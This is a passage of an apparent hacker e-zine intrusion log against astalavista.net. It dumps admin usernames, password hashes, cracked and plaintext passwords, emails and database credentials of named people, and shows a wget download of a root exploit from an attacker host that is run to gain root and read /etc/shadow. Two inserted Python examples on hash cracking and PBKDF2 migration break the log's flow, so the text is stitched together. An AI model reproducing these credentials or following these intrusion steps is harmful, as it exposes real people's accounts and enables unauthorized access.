- | contrexx_module_shop_orders |
- | contrexx_module_shop_payment |
- | contrexx_module_shop_payment_processors |
- | contrexx_module_shop_pricelists |
- | contrexx_module_shop_products |
- | contrexx_module_shop_products_attributes |
- | contrexx_module_shop_products_attributes_name |
- | contrexx_module_shop_products_attributes_value |
- | contrexx_module_shop_products_downloads |
- | contrexx_module_shop_rel_countries |
- | contrexx_module_shop_rel_payment |
- | contrexx_module_shop_rel_shipment |
- | contrexx_module_shop_shipment_cost |
- | contrexx_module_shop_shipper |
- | contrexx_module_shop_vat |
- | contrexx_module_shop_zones |
- | contrexx_module_u2u_address_list |
- | contrexx_module_u2u_message_log |
- | contrexx_module_u2u_sent_messages |
- | contrexx_module_u2u_settings |
- | contrexx_module_u2u_user_log |
- | contrexx_modules |
- | contrexx_sessions |
- | contrexx_settings |
- | contrexx_settings_smtp |
- | contrexx_skins |
- | contrexx_stats_browser |
- | contrexx_stats_colourdepth |
- | contrexx_stats_config |
- | contrexx_stats_country |
- | contrexx_stats_hostname |
- | contrexx_stats_javascript |
- | contrexx_stats_operatingsystem |
- | contrexx_stats_referer |
- | contrexx_stats_requests |
- | contrexx_stats_requests_summary |
- | contrexx_stats_screenresolution |
- | contrexx_stats_search |
- | contrexx_stats_spiders |
- | contrexx_stats_spiders_summary |
- | contrexx_stats_visitors |
- | contrexx_stats_visitors_summary |
- | contrexx_voting_additionaldata |
- | contrexx_voting_email |
- | contrexx_voting_rel_email_system |
- | contrexx_voting_results |
- | contrexx_voting_system |
- | foo |
- +--------------------------------------------------+
- 227 rows in set (0.01 sec)
- mysql> select count(*) as skids from contrexx_access_users;
- +-------+
- | skids |
- +-------+
- | 53699 |
- +-------+
- 1 row in set (0.00 sec)
- mysql> describe contrexx_access_users;
- +------------------+------------------------------------------+------+-----+--------------+----------------+
- | Field | Type | Null | Key | Default | Extra |
- +------------------+------------------------------------------+------+-----+--------------+----------------+
- | id | int(10) unsigned | NO | PRI | NULL | auto_increment |
- | is_admin | tinyint(1) unsigned | NO | | 0 | |
- | username | varchar(40) | YES | MUL | NULL | |
- | password | varchar(32) | YES | | NULL | |
- | regdate | int(14) unsigned | NO | | 0 | |
- | expiration | int(14) unsigned | NO | | 0 | |
- | validity | int(10) unsigned | NO | | 0 | |
- | last_auth | int(14) unsigned | NO | | 0 | |
- | last_activity | int(14) unsigned | NO | | 0 | |
- | email | varchar(255) | YES | | NULL | |
- | email_access | enum('everyone','members_only','nobody') | NO | | nobody | |
- | frontend_lang_id | int(2) unsigned | NO | | 0 | |
- | backend_lang_id | int(2) unsigned | NO | | 0 | |
- | active | tinyint(1) | NO | | 0 | |
- | profile_access | enum('everyone','members_only','nobody') | NO | | members_only | |
- | restore_key | varchar(32) | NO | | | |
- | restore_key_time | int(14) unsigned | NO | | 0 | |
- | u2u_active | enum('0','1') | NO | | 1 | |
- +------------------+------------------------------------------+------+-----+--------------+----------------+
- 18 rows in set (0.00 sec)
- mysql> select username,password,email from contrexx_access_users where is_admin = 1;
- +------------+----------------------------------+-----------------------------+
- | username | password | email |
- +------------+----------------------------------+-----------------------------+
- | system | 0defe9e458e745625fffbc215d7801c5 | info@comvation.com |
- | prozac | 1f65f06d9758599e9ad27cf9707f92b5 | prozac@astalavista.com |
- | Be1er0ph0r | 78d164dc7f57cc142f07b1b4629b958a | paulo.santos@astalavista.ch |
- | schmid | 0defe9e458e745625fffbc215d7801c5 | ivan.schmid@comvation.com |
- +------------+----------------------------------+-----------------------------+
- 4 rows in set (0.04 sec)
- mysql> exit;
- Bye
- [~] There you go, your "team of security and IT professionals" is a joke.
- +------------------------------+
- system:f82BN3+_*
- Be1er0ph0r:belerophor4astacom
- prozac:asta4cms!
- commander:mpbdaagf6m
- sykadul:ak29eral
- +------------------------------+
- [~] Paulo M. Santos AKA Be1er0ph0r needs to be shot down for his milw0rm ripping script(s)
- ...and the others, find another area to get paid from, security isn't for sale and you obviously fail at it.
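The table above keeps passwords as 32-hex-character values in a `varchar(32)` column with no salt field (length and column type match MD5), which is why `system` and `schmid` show the identical hash and why the plaintexts could be listed a few lines later; the DVD `.htpasswd` uses 13-character traditional crypt(3) strings, whose 12-bit salt and 8-character password limit are not much better. As an added example, not the site's code and using a constructed user table and wordlist instead of the leaked values, this Python shows the three checks a reviewer would run on such a dump: classify the hash format, find accounts sharing a hash, and run a dictionary attack. It finishes with salted, iterated PBKDF2 storage, chosen here as the replacement scheme, under which the same password no longer yields the same stored value.

```python
"""Added example: triage a leaked password table.

Not part of the original release. Users, hashes and the wordlist below are
constructed for the demo; PBKDF2 is this example's own choice of
replacement scheme, not anything the site ran.
"""
import hashlib
import hmac
import os
import re
from typing import Dict, List, Optional, Tuple

MD5_HEX = re.compile(r"^[0-9a-f]{32}$")
DES_CRYPT = re.compile(r"^[./0-9A-Za-z]{13}$")   # 2-char salt + 11-char DES output


def identify_hash(stored: str) -> str:
    """Cheap format triage: tells you which cracking approach applies."""
    if MD5_HEX.match(stored):
        return "md5-unsalted"     # no salt: identical passwords -> identical hashes
    if DES_CRYPT.match(stored):
        return "des-crypt"        # 12-bit salt, only the first 8 password chars count
    return "unknown"


def md5_hex(word: str) -> str:
    return hashlib.md5(word.encode()).hexdigest()


def shared_hashes(rows: List[Tuple[str, str]]) -> Dict[str, List[str]]:
    """Accounts grouped by identical hash; with unsalted storage that is a shared password."""
    by_hash: Dict[str, List[str]] = {}
    for user, h in rows:
        by_hash.setdefault(h, []).append(user)
    return {h: users for h, users in by_hash.items() if len(users) > 1}


def crack_md5(rows: List[Tuple[str, str]], wordlist: List[str]) -> Dict[str, str]:
    """Dictionary attack: hash each candidate once, look it up against every account."""
    targets: Dict[str, List[str]] = {}
    for user, h in rows:
        if identify_hash(h) == "md5-unsalted":
            targets.setdefault(h, []).append(user)
    cracked: Dict[str, str] = {}
    for word in wordlist:
        for user in targets.get(md5_hex(word), []):
            cracked[user] = word
    return cracked


def pbkdf2_store(password: str, salt: Optional[bytes] = None,
                 iterations: int = 100_000) -> str:
    """Salted, iterated storage: same password, different salt -> different record."""
    salt = os.urandom(16) if salt is None else salt
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"


def pbkdf2_verify(password: str, stored: str) -> bool:
    _, iterations, salt_hex, dk_hex = stored.split("$")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(),
                             bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(dk.hex(), dk_hex)


# Constructed sample table in the shape of the dump above: (username, stored value).
SAMPLE_ROWS = [
    ("system", md5_hex("letmein")),
    ("schmid", md5_hex("letmein")),          # same password as system -> same hash
    ("ops", md5_hex("Winter2009")),
    ("jon", md5_hex("vK8#qL2!mZ9r")),        # not in the wordlist; stays uncracked
    ("DVDdownload", "ab0123456789."),         # 13-char crypt(3)-shaped value, constructed
]
WORDLIST = ["password", "123456", "letmein", "qwerty", "Winter2009"]


def run_demo() -> dict:
    return {
        "formats": {u: identify_hash(h) for u, h in SAMPLE_ROWS},
        "shared": shared_hashes(SAMPLE_ROWS),
        "cracked": crack_md5(SAMPLE_ROWS, WORDLIST),
    }


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(f"{key}: {value}")
    record = pbkdf2_store("letmein")
    print("pbkdf2 record:", record)
    print("verify ok:", pbkdf2_verify("letmein", record))
```

The dictionary attack costs one MD5 per candidate word regardless of how many accounts are in the table, which is the property salting removes: with a per-user salt each account has to be attacked separately, and the iteration count makes every guess expensive. The crypt(3) values are deliberately only identified here, not cracked; Python's `crypt` module is deprecated and the point for a reviewer is that both formats in this dump are 1990s schemes that should not be protecting anything.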
- [~] Let's move to astalavista.net now.
- From <https://www.astalavista.net/>:
- >> Everyone knows that the best defense is a good offense.
- >> Those who wait for their foes to find a security loophole are opting for the wrong strategy.
- >> The ASTALAVISTA hacking & security community is the largest IT security community in the world.
- >> It's a platform for both IT specialists and novices, and anyone interested in expanding and updating their knowledge regarding IT security and hacking.
- >> Go ahead, try and hack our server, in a completely legal way!
- >> Learn by doing: We offer our members tricky tasks and challenges on an
- >> ongoing basis so you can test your knowledge and abilities. You can also
- >> demonstrate what you've mastered by taking part in regular hacker contests
- >> and war games.
- [~] Let's take a look there, after all... they are hack-proof, aren't they?!
- [-] Tricky task: Find home dir of astalavista.net
- sh-3.2$ ls -la ~astanet
- total 48
- drwx--x--x 6 astanet astanet 4096 Dec 23 15:55 .
- drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
- drwxr-xr-x 2 root root 4096 Dec 23 16:00 auth
- -rw------- 1 astanet astanet 3892 Apr 16 12:14 .bash_history
- -rw-r--r-- 1 astanet astanet 33 Dec 17 21:50 .bash_logout
- -rw-r--r-- 1 astanet astanet 176 Dec 17 21:50 .bash_profile
- -rw-r--r-- 1 astanet astanet 124 Dec 17 21:50 .bashrc
- drwx--x--x 3 astanet astanet 4096 Dec 23 12:18 domains
- drwxrwx--- 3 astanet mail 4096 Dec 23 12:18 imap
- drwx------ 2 astanet astanet 4096 Dec 23 12:18 mail
- lrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html
- -rw-r----- 1 astanet mail 34 Dec 22 12:41 .shadow
- sh-3.2$ cd /home/astanet/domains/astalavista.net/private_html/
- sh-3.2$ ls -la
- total 200
- drwxr-x--- 29 astanet apache 4096 Jan 6 13:58 .
- drwx--x--x 8 astanet astanet 4096 Dec 23 13:53 ..
- drwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 _007
- drwxr-xr-x 7 astanet astanet 4096 Jan 5 2006 _0mysql
- drwxr-xr-x 7 astanet astanet 4096 Dec 22 14:16 astanet@astalavista.com
- drwxrwxrwx 2 astanet astanet 4096 Jan 5 2006 backend
- drwxr-xr-x 2 astanet astanet 4096 Oct 24 2006 banner
- -rw-r--r-- 1 astanet astanet 25724 Apr 4 2006 banner.jpg
- drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 config
- drwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 cron
- drwxr-xr-x 11 astanet astanet 4096 Jan 5 2006 dvd
- -rw-r--r-- 1 astanet astanet 36 Jan 5 2006 error.php
- -rw-r--r-- 1 astanet astanet 1406 Jan 5 2006 favicon.ico
- drwxrwxrwx 2 astanet astanet 4096 Dec 15 2006 feed
- drwxr-xr-x 3 astanet astanet 4096 Dec 8 2006 flashtour
- -rw-r--r-- 1 astanet astanet 18 Jan 5 2006 htaccess
- -rw-r--r-- 1 astanet astanet 585 Mar 24 14:50 .htaccess
- -rw-r--r-- 1 astanet astanet 398 Jan 5 2006 index1.php
- -rw-r--r-- 1 astanet astanet 1036 Jan 5 2006 _index.html
- -rw-r--r-- 1 astanet astanet 6880 Dec 23 14:44 index.php
- -rw-r--r-- 1 astanet astanet 676 Mar 21 2006 index_redirect.php
- -rw-r--r-- 1 astanet astanet 739 Feb 24 2006 index.swf
- drwxr-xr-x 4 astanet astanet 4096 Oct 18 2006 irc
- drwxr-xr-x 4 astanet astanet 4096 Aug 11 2006 lang
- drwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 lib
- drwxr-xr-x 6 astanet astanet 4096 Aug 11 2006 log
- drwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 member
- drwxrwxrwx 5 astanet astanet 4096 Jun 4 00:03 memberdata
- drwxr-xr-x 2 astanet astanet 4096 Jan 5 2006 new
- -rw-r--r-- 1 astanet astanet 7219 Feb 24 2006 pix1.swf
- drwxr-xr-x 2 astanet astanet 4096 Oct 27 2006 re
- -rw-r--r-- 1 astanet astanet 23 Jan 5 2006 robots.txt
- drwxr-xr-x 3 astanet astanet 4096 Aug 11 2006 rss
- drwxr-xr-x 39 astanet astanet 4096 Dec 13 2007 sources
- drwxrwxrwx 3 astanet astanet 4096 Feb 2 15:40 temp_com
- drwxr-xr-x 7 astanet astanet 4096 Aug 11 2006 themes
- drwxr-xr-x 2 astanet astanet 4096 Mar 14 2008 tmp_src
- drwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 tpl
- drwxr-xr-x 3 astanet astanet 4096 Sep 7 2006 v2
- drwxr-xr-x 16 astanet astanet 4096 Jul 5 2006 v2_old
- -rw-r--r-- 1 astanet astanet 35 Dec 4 2006 webcash.php
- drwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 wiki
- sh-3.2$ head -20 index.php
- <?PHP
- /**
- * Mainfile (external) for astalavistaNET v2.0
- *
- * @copyright Astalavista IT Engineering GmbH
- * @author Thomas Kaelin <thomas.kaelin@astalavista.ch>
- * @version 1.0
- */
- if ($_SERVER['PHP_SELF'] == '/webcash.php') {
- $dontStartSession = false;
- } else {
- $dontStartSession = true;
- }
- require_once($_SERVER['DOCUMENT_ROOT'].'/config/com.conf.php');
- require_once($_SERVER['DOCUMENT_ROOT'].'/config/ext.conf.php');
- require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].'com.class.php');
- require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].'ext.class.php');
- sh-3.2$ cd config
- sh-3.2$ ls -la
- total 32
- drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 .
- drwxr-x--- 29 astanet apache 4096 Jan 6 13:58 ..
- -rw-r--r-- 1 astanet astanet 987 Aug 11 2006 adm.conf.php
- -rw-r--r-- 1 astanet astanet 4937 Dec 23 15:48 com.conf.php
- -rw-r--r-- 1 astanet astanet 913 Aug 11 2006 cron.conf.php
- -rw-r--r-- 1 astanet astanet 1668 Aug 20 2008 ext.conf.php
- -rw-r--r-- 1 astanet astanet 2724 May 30 2007 int.conf.php
- sh-3.2$ cat com.conf.php
- [snip]
- //member-database
- $_CONFIG['db_mem_server'] = 'localhost';
- $_CONFIG['db_mem_database'] = 'astanet_membersystem';
- $_CONFIG['db_mem_user'] = 'astanet_db';
- $_CONFIG['db_mem_password'] = 'TXwVrC7hbq';
- $_CONFIG['db_mem_debug'] = false; //true or false
- //ads-database
- $_CONFIG['db_ads_server'] = 'localhost';
- $_CONFIG['db_ads_database'] = 'astanet_ads';
- $_CONFIG['db_ads_user'] = 'astanet_db';
- $_CONFIG['db_ads_password'] = 'TXwVrC7hbq';
- $_CONFIG['db_ads_debug'] = false; //true or false
- //rainbow-database
- $_CONFIG['db_rainbow_server'] = '212.254.194.163';
- $_CONFIG['db_rainbow_database'] = 'rainbow';
- $_CONFIG['db_rainbow_user'] = 'dinu';
- $_CONFIG['db_rainbow_password'] = 'dinudinu';
- $_CONFIG['db_rainbow_debug'] = false; //true or false
- //mailing lists database
- $_CONFIG['db_mailing_lists_server'] = 'localhost';
- $_CONFIG['db_mailing_lists_database'] = 'astanet_mailing_lists';
- $_CONFIG['db_mailing_lists_user'] = 'astanet_db';
- $_CONFIG['db_mailing_lists_password'] = 'TXwVrC7hbq';
- $_CONFIG['db_mailing_lists_debug'] = false; //true or false
- //paypal
- $_CONFIG['sub_pp_url'] = 'https://www.paypal.com/cgi-bin/webscr';
- $_CONFIG['sub_pp_cmd'] = '_xclick';
- $_CONFIG['sub_pp_business'] = 'info@astalavista.net';
- $_CONFIG['sub_pp_noship'] = '1';
- $_CONFIG['sub_pp_referer'] = 'https://www.paypal.com/';
- [snip]
- sh-3.2$ cd ..
- sh-3.2$ cd member
- sh-3.2$ ls -la
- total 20
- drwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 .
- drwxr-x--- 29 astanet apache 4096 Jan 6 13:58 ..
- -rw-r--r-- 1 astanet astanet 19 Jan 13 14:02 .htaccess
- -rwxr-xr-x 1 astanet astanet 6709 Jan 13 14:06 index.php
- sh-3.2$ cat .htaccess
- SecFilterEngine off
- sh-3.2$ cd ..
- sh-3.2$ cd cron
- sh-3.2$ ls -la
- total 168
- drwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 .
- drwxr-x--- 29 astanet apache 4096 Jan 6 13:58 ..
- -rw-r--r-- 1 astanet astanet 1272 Jan 12 08:24 0_corefile.php
- -rw-r--r-- 1 astanet astanet 2356 Aug 11 2006 0_functions.php
- -rw-r--r-- 1 astanet astanet 3616 Dec 23 15:44 1_daily.php
- -rw-r--r-- 1 astanet astanet 527 Aug 11 2006 1_fivemin.php
- -rw-r--r-- 1 astanet astanet 5006 Dec 23 15:39 1_hourly.php
- -rw-r--r-- 1 astanet astanet 432 Aug 11 2006 1_weekly.php
- -rw-r--r-- 1 astanet astanet 2277 Aug 11 2006 2_advertising.php
- -rw-r--r-- 1 astanet astanet 4882 Dec 23 15:40 2_archives.php
- -rw-r--r-- 1 astanet astanet 3784 Aug 16 2006 2_awstats.sh
- -rw-r--r-- 1 astanet astanet 14894 Jan 12 08:51 2_expire.bak.php
- -rw-r--r-- 1 astanet astanet 14979 Jan 12 09:10 2_expire.php
- -rw-r--r-- 1 astanet astanet 7657 Aug 15 2006 2_exploitree_updater.php
- -rw-r--r-- 1 astanet astanet 686 Dec 23 16:31 2_filesize.sh
- -rw-r--r-- 1 astanet astanet 9853 Aug 11 2006 2_keywords_old.php
- -rw-r--r-- 1 astanet astanet 15664 Sep 22 2006 2_keywords.php
- -rw-r--r-- 1 astanet astanet 1233 Aug 11 2006 2_proxy_checker.php
- -rw-r--r-- 1 astanet astanet 7558 Aug 11 2006 2_proxy_collector.php
- -rw-r--r-- 1 astanet astanet 796 Aug 11 2006 99_create_emails.php
- drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 99_lang_email
- -rw-r--r-- 1 astanet astanet 9622 Jan 6 16:04 login_reminder.php
- -rw-r--r-- 1 astanet astanet 9620 Jan 6 16:05 login_reminder_test.php
- sh-3.2$ cd ..
- sh-3.2$ cd _007
- sh-3.2$ ls -la
- total 24
- drwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 .
- drwxr-x--- 29 astanet apache 4096 Jan 6 13:58 ..
- -rw-r--r-- 1 astanet astanet 96 Dec 23 15:17 .htaccess
- -rw-r--r-- 1 astanet astanet 3263 Jan 15 2007 index.php
- -rw-r--r-- 1 astanet astanet 20 Dec 27 2006 info.php
- drwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 sitemap
- sh-3.2$ cat .htaccess
- authType Basic
- authName Admin
- authUserFile /home/astanet/auth/.htadm_pwd
- require valid-user
- sh-3.2$ cat /home/astanet/auth/.htadm_pwd
- admin2net:CR0bl65MwhfT
- sh-3.2$ mysql -u astanet_db -p
- Enter password:
- Welcome to the MySQL monitor. Commands end with ; or \g.
- Your MySQL connection id is 275153
- Server version: 5.0.45-community-log MySQL Community Edition (GPL)
- Type 'help;' or '\h' for help. Type '\c' to clear the buffer.
- mysql> show databases;
- +-----------------------+
- | Database |
- +-----------------------+
- | information_schema |
- | astanet_ads |
- | astanet_mailing_lists |
- | astanet_mediawiki |
- | astanet_membersystem |
- | test |
- +-----------------------+
- 6 rows in set (0.00 sec)
- mysql> use astanet_membersystem
- Database changed
- mysql> show tables;
- +-----------------------------------+
- | Tables_in_astanet_membersystem |
- +-----------------------------------+
- | blacklist_categories |
- | blacklist_content |
- | blacklist_levels |
- | blacklist_mcset |
- | dir_categories |
- | dir_comments |
- | dir_links |
- | dir_temp |
- | dir_votes |
- | documents |
- | documents_categories |
- | email_content |
- | email_settings |
- | exploits |
- | exploits_categories |
- | exploittree_categories |
- | exploittree_exploits |
- | home_values |
- | iso_countries |
- | links_categories |
- | links_records |
- | links_unauth |
- | links_votes |
- | log |
- | news_categories |
- | news_comments |
- | news_emoticons |
- | news_latest |
- | news_messages |
- | news_statistics |
- | news_votes |
- | prices_content |
- | prices_offers |
- | rss_settings |
- | sessions |
- | stats_signups |
- | u2u2 |
- | u2u_contact |
- | u2u_settings |
- | user_keywords_selected_categories |
- | users |
- | users_ipn_test |
- | users_keyword_values |
- | users_profile |
- | users_temp |
- | users_upgrade |
- +-----------------------------------+
- 46 rows in set (0.00 sec)
- mysql> describe users;
- +--------------------------+--------------------------------------+------+-----+---------------------+----------------+
- | Field | Type | Null | Key | Default | Extra |
- +--------------------------+--------------------------------------+------+-----+---------------------+----------------+
- | primary_key | smallint(5) unsigned | NO | PRI | NULL | auto_increment |
- | user | varchar(50) | NO | | | |
- | nickname | varchar(30) | NO | MUL | anonymous | |
- | password | varchar(30) | NO | | | |
- | userlevel | tinyint(3) | YES | MUL | NULL | |
- | exp | int(8) unsigned | NO | | 0 | |
- | email | varchar(50) | NO | | | |
- | ip | varchar(15) | NO | | 0 | |
- | proxy | set('0','1') | NO | | 0 | |
- | logtime | timestamp | NO | | CURRENT_TIMESTAMP | |
- | login_reminder_last_sent | timestamp | NO | | 0000-00-00 00:00:00 | |
- | anz_in | tinyint(1) | NO | | -1 | |
- | status | tinyint(1) unsigned | NO | | 0 | |
- | checked | set('0','1','2') | NO | | 0 | |
- | freemember | set('0','1') | NO | | 0 | |
- | ordertype | set('transfer','wp','pp','mc','CnB') | YES | | NULL | |
- | lang | tinytext | NO | | | |
- | adid | smallint(6) | NO | | 0 | |
- | pp_txn_id | varchar(255) | YES | | NULL | |
- | cnb_transaction_id | varchar(255) | YES | | NULL | |
- | cnb_order_id | varchar(255) | YES | | NULL | |
- | cnb_user_id | int(11) | YES | | 0 | |
- +--------------------------+--------------------------------------+------+-----+---------------------+----------------+
- 22 rows in set (0.01 sec)
- mysql> select count(*) as skids from users;
- +-------+
- | skids |
- +-------+
- | 25199 |
- +-------+
- 1 row in set (0.00 sec)
- mysql> select user,nickname,password,email from users where userlevel = 1;
- +--------------------------+----------------------+------------------+-----------------------------------+
- | user | nickname | password | email |
- +--------------------------+----------------------+------------------+-----------------------------------+
- | pascal | prozac | astaman3 | info@astalavista.net |
- | Ivan Schmid | rOOtless1 | astalavista4asta | ivan.schmid@comvation.com |
- | qreymer | Palermo | qblsw85iam | eche@home.se |
- | Christian Wehrli | g0atherd | hitt?74 | g0atherd@gmx.net |
- | Andrew Blake | Minky | liq73uid | a.blake@har.mrc.ac.uk |
- | Martin Wyss | dinu | kj63;cXy | martin.wyss@astalavista.net |
- | Leandro Nery | Timan_no_Sanco | nery2002 | leandronery@hotmail.com |
- | shaving ryans privates | ShavingRyansPrivates | memberboard313 | shavingryansprivates1@hotmail.com |
- | Gerben van der Lubbe | Spoofed Existence | Lb59eXg5 | spoofedexistence@hotmail.com |
- | David M Lee | Daremo | icG12m03 | daremo@hackerheaven.com |
- | David Corn | akriel | ve3uB$cUku | akriel@fallenroot.net |
- | Thomas Kalin | Gwanun | QwErTy123 | thomas.kaelin@astalavista.net |
- | Marcus unknown | Cra58cker | hhCr4ck06 | unknownmarcus@hotmail.com |
- | David Ellis | dellis203 | philip | dellis@nightwatchnss.com |
- | Lars Christian Solberg | xeor | tF3s4|Nea | xeor@hush.com |
- | Paulo Santos | Be1er0ph0r1 | amor01 | pmsantos@gmx.ch |
- | Thomas D?ppen | daha | asta4tom | thomas.daeppen@astalavista.ch |
- | Touraj Abbasi Moghaddasi | -Crow1 | NetR0ck | toraj.a.m@gmail.com |
- | Fabius Bernet | traviser | wellenreiter100 | fabius.bernet@astalavista.ch |
- | Zachary McElroy | duder1 | dirty245dix | mcelroyzj@yahoo.com |
- | Leron Cohen | cohen2 | leron4free | leron@quiredmedia.com |
- | Beatriz Pontes | anonymous1656 | pitas | joao.pedro.pontes@gmail.com |
- | Glafkos Charalambous | anonymous2086 | si99490178$# | nowayout@webhostline.com |
- | developer COMVATION | anonymous2402 | Ri?Q$Q$MVU | ivan.schmid@astalavista.ch |
- | Peter Fisher | cyph3r1 | testZer025435 | cyph3r@astalavista.com |
- | sykadul | sykadul | ak29eral | sykadul@gmail.com |
- | Ronny Janzi | commander1 | mpbdaagf6m | ronny.janzi@astalavista.ch |
- +--------------------------+----------------------+------------------+-----------------------------------+
- 27 rows in set (0.00 sec)
- mysql> exit;
- Bye
- [~] plaintext passwords? Yes.
- Those so-called "security professionals" who charge you $6.66 / month to
- register at their hack-proof portal save your passwords in plaintext...
- brilliant!
- [~] This has been fun but we want more.
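- An added example, not code from the leaked site or its authors: a Python stand-in for the `users` table shown above that replaces the plaintext `password varchar(30)` column with salted PBKDF2 records and verifies logins against them. The rows, the SQLite schema subset and the iteration count are constructed assumptions for the demo.

```python
"""Added example (not from the leaked site): salted PBKDF2 password storage
for a `users` table whose `password` column currently holds plaintext.
Rows, schema subset and cost parameter below are constructed for the demo."""
import hashlib
import hmac
import os
import sqlite3

PBKDF2_ITERATIONS = 200_000  # assumed cost; tune to the server's hardware


def hash_password(password: str, salt: bytes = b"") -> str:
    """Return a self-describing record: pbkdf2_sha256$iterations$salt_hex$hash_hex."""
    salt = salt or os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, PBKDF2_ITERATIONS)
    return f"pbkdf2_sha256${PBKDF2_ITERATIONS}${salt.hex()}${dk.hex()}"


def is_hashed(value: str) -> bool:
    """True when the stored value is already a PBKDF2 record, not legacy plaintext."""
    return value.startswith("pbkdf2_sha256$") and value.count("$") == 3


def verify_password(password: str, stored: str) -> bool:
    """Constant-time comparison; a legacy plaintext value never verifies here."""
    try:
        alg, iters, salt_hex, hash_hex = stored.split("$")
    except ValueError:
        return False
    if alg != "pbkdf2_sha256":
        return False
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                             bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(dk.hex(), hash_hex)


def open_demo_db() -> sqlite3.Connection:
    """Constructed stand-in for the `users` table: subset of columns, fake rows.
    Note: the real column would need widening (varchar(30) cannot hold the record)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (primary_key INTEGER PRIMARY KEY, user TEXT, "
                 "nickname TEXT, password TEXT, userlevel INTEGER)")
    conn.executemany(
        "INSERT INTO users (user, nickname, password, userlevel) VALUES (?, ?, ?, ?)",
        [("alice", "al", "hunter2", 1), ("bob", "b0b", "correct horse", 2)])
    return conn


def migrate_plaintext(conn: sqlite3.Connection) -> int:
    """One-shot migration: hash every row still holding a plaintext password.
    Returns the number of rows rewritten, so a second run reports 0."""
    migrated = 0
    for pk, pw in conn.execute("SELECT primary_key, password FROM users").fetchall():
        if not is_hashed(pw):
            conn.execute("UPDATE users SET password = ? WHERE primary_key = ?",
                         (hash_password(pw), pk))
            migrated += 1
    conn.commit()
    return migrated


def login(conn: sqlite3.Connection, user: str, password: str) -> bool:
    """Look up the stored record for `user` and verify the candidate password."""
    row = conn.execute("SELECT password FROM users WHERE user = ?", (user,)).fetchone()
    return row is not None and verify_password(password, row[0])
```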
- sh-3.2$ uname -a
- Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
- sh-3.2$ wget http://anti.sec.labs/g0troot
- --13:33:37-- http://anti.sec.labs/g0troot
- Resolving anti.sec.labs... 13.33.33.37
- Connecting to anti.sec.labs|13.33.33.37|:80... connected.
- HTTP request sent, awaiting response... 200 OK
- Length: 18200 (18K) [text/plain]
- Saving to: `g0troot'
- 100%[=========================================================================================================================================>] 18,200 58.6K/s in
- 0.3s
- 18:55:14 (58.6 KB/s) - `g0troot' saved [18200/18200]
- sh-3.2$ ./g0troot -i x86_64
- [+] g0troot - anti.sec.labs
- [+] Target: 2.6.18-128.1.10.el5
- [~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]
- [+] r00tr00t
- [~] Executing shell...
- sh-3.2# id
- uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
- sh-3.2# cat /etc/shadow
- [snip]
- sh-3.2# cat /etc/motd
- #####################################################
- #____ ____ ___ ____ _ ____ _ _ _ ____ ___ ____ #
- # |__| [__ | |__| | |__| | | | [__ | |__| #
- # | | ___] | | | |___ | | \/ | ___] | | | #
- # #
- #####################################################
- # #
- # Admin Contact - support@secureservertech.com #
- # #
- # Available ShortCuts #
- # #
- # nst - list active connections #
- # ddos - shows how many times each ip is connected #
- # ltr - restart the webserver #
- # phpc - edit the php config file #
- # htc - edit the webserver configuration file #
- # up - uptime #
- # etd - edit the motd of the day file #
- # htr - start and restart apache if needed #
- # syng - shows active SYN_RECV connections #
- # synd - syn flood blocker - "synd -h" for usage #
- #####################################################
- # NOTES: #
- # Last Upgrade - 12-08-2008 by JF #
- # My.cnf/Mysql Optimization - 1-28-09 #
- # #
- # #
- # #
- #####################################################
- sh-3.2# lastlog | grep -v Never
- Username Port From Latest
- root pts/1 adsl-194-162-fix Thu Jun 4 07:19:14 +0000 2009
- admin pts/1 cp.secureservert Thu Mar 20 10:25:39 +0000 2008
- com pts/0 cust.static.212- Tue Jun 2 07:46:30 +0000 2009
- astanet pts/0 adsl-194-162-fix Thu Apr 16 08:20:44 +0000 2009
- sh-3.2# ls -la
- total 453376
- drwxr-x--- 15 root root 4096 Jun 4 08:40 .
- drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
- -rw-r--r-- 1 root root 2394400 Oct 19 2007 10mbtest.zip
- -rw------- 1 root root 1006 Sep 11 2007 anaconda-ks.cfg
- -rw------- 1 root root 16836 Jun 4 07:21 .bash_history
- -rw-r--r-- 1 root root 24 Jan 6 2007 .bash_logout
- -rw-r--r-- 1 root root 191 Jan 6 2007 .bash_profile
- -rw-r--r-- 1 root root 176 Jan 6 2007 .bashrc
- -rwx------ 1 root root 1899 Oct 28 2007 bk.sh
- -rw-r--r-- 1 root root 1327 Nov 29 2007 cert
- -rw-r--r-- 1 root root 139860821 May 14 2008 contrexxbackup_20080514.sql
- drwxr-xr-x 4 root root 4096 May 20 2008 .cpan
- -rw-r--r-- 1 root root 100 Jan 6 2007 .cshrc
